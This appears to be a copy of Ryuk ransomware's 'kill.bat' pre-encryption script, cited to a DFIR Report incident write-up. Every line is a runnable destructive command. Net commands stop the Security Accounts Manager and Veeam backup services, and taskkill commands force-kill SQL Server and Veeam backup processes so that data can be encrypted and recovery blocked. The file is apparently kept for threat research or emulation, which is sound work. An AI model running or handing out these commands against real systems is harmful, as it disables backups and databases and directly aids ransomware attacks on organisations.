:: ryuk kill.bat from https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

net1 stop samss /y
net1 stop veeamcatalogsvc /y
net1 stop veeamcloudsvc /y
net1 stop veeamdeploysvc /y
net.exe stop samss /y
net.exe stop veeamcatalogsvc /y
net.exe stop veeamcloudsvc /y
net.exe stop veeamdeploysvc /y
taskkill.exe /IM sqlbrowser.exe /F
taskkill.exe /IM sqlceip.exe /F
taskkill.exe /IM sqlservr.exe /F
taskkill.exe /IM sqlwriter.exe /F
taskkill.exe /IM veeam.backup.agent.configurationservice.exe /F
taskkill.exe /IM veeam.backup.brokerservice.exe /F
taskkill.exe /IM veeam.backup.catalogdataservice.exe /F
taskkill.exe /IM veeam.backup.cloudservice.exe /F
taskkill.exe /IM veeam.backup.externalinfrastructure.dbprovider.exe /F
taskkill.exe /IM veeam.backup.manager.exe /F
taskkill.exe /IM veeam.backup.mountservice.exe /F
taskkill.exe /IM veeam.backup.service.exe /F
taskkill.exe /IM veeam.backup.uiserver.exe /F
taskkill.exe /IM veeam.backup.wmiserver.exe /F
taskkill.exe /IM veeamdeploymentsvc.exe /F
taskkill.exe /IM veeamfilesysvsssvc.exe /F
taskkill.exe /IM veeam.guest.interaction.proxy.exe /F
taskkill.exe /IM veeamnfssvc.exe /F
taskkill.exe /IM veeamtransportsvc.exe /F
